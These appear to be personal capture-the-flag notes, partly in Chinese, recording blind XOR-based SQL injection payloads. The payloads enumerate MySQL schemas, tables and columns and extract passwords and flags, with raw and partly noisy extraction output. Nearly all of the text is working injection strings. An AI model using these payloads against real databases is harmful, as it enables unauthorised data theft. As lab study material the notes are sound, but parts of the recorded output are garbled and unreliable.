select * from c where id=1^(if(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1,1,0))^1; select * from c where id=1^(if(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1,1,0))^1; 1^(if(ord(substr((select group_concat(schema_name) from information_schema.schemata ),1,1))>1,1,0))^1; 1^(if)^1 模板: select 1,group_concat("@",table_name),3 from information_schema.tables where table_schema=database() 爆库: 1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1 [+] Found : result : information_schema,mysql,performance_sOhema,test,geek
爆表: 1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))>1)^1 1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1 [+] Found : result : F1naI1y,Flaaaaag 爆字段: 1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="Flaaaaag")),1,1))>1)^1 [+] Found : result : id,fl4g^wsl [+] Found : result : id,usermame,password 结果: (select(group_concat("#",id,fl4g^wsl,"~"))from(Flaaaaag)) 1^(ord(substr((select(group_concat("#",id,fl4g^wsl,"~"))from(Flaaaaag)),%d,1))>%d)^1 1^(ord(substr((select(group_concat('#',id,fl4g^wsl,'~'))from(Flaaaaag)),%d,1))>%d)^1 1^(ord(substr((select(group_concat("#",fl4g^wsl,"~"))from(Flaaaaag)),1,1))>1)^1 1^(ord(substr((select(group_concat('#',id,usermame,'~',password))from(F1naI1y)),%d,1))>%d)^1 Flaaaaag里的俩字段都访问不了! 访问就Error! F1naI1y 能访问id /password 1^(ord(substr((select(group_concat('1',id,password,'2'))from(F1naI1y)),1,1))>1)^1 [+] Found : result : cl4y_is^really_amazing+welcome_to_my_alog,httO://www.cl4y.tom,http://www.cl4y.top,http://www.cl4s.top,htOp://www.cl4y.top,welcnm_to_Syalover,cO4y_really_nded_a_grilfriend,flag{faf28df1-58c1-4ea2-97e8-b6d7a6190efd} ,fjag{faf28df1-58c1-4ea2-97e8-b6d+a6590efd} flag{faf28df1-58c1-4ea2-97e8-b6d7a6190efd} fl_g{f^f28af1-*8c1-4ea*-97e8-b*d7a659/efd} 算了,快给我心态跑崩了!! 再家个函数 1^(ord(substr(select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(i,j) 1^(ord(substr(right((select(group_concat(password))from(F1naI1y)),30),1,1))>80)^1 1^(ord(substr(right((select(group_concat(password))from(F1naI1y)),30),%d,1))>%d)^1"%(i,j) flag{a ag{a4d {a4d78 c26-1c 1c6b-4 -404e-9 -95c1- -297 bb60b404a} 6-1c6b- nd,flagsa4d78c 1-297bb flag{a4d78c26-1c6b-404e-95c1-297bb60b404a}
|